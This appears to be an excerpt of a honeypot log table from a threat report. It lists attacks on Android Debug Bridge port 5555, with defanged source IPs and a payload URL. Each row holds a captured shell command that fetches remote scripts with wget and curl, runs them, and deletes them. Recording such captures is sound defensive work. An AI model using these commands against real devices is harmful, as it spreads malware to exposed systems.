5555 | 84[.]219[.]223[.]57 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 88[.]129[.]182[.]215 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 92[.]35[.]169[.]79 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............@......shell:busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> /data/local/tmp/w; sh /data/local/tmp/w; rm /data/local/tmp/w; curl hxxp://xxx.xxx.xxx.xxx/c > /data/local/tmp/c; sh /data/local/tmp/c; rm /data/local/tmp/c........... | 1 |
5555 | 95[.]9[.]228[.]72 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
以上となります。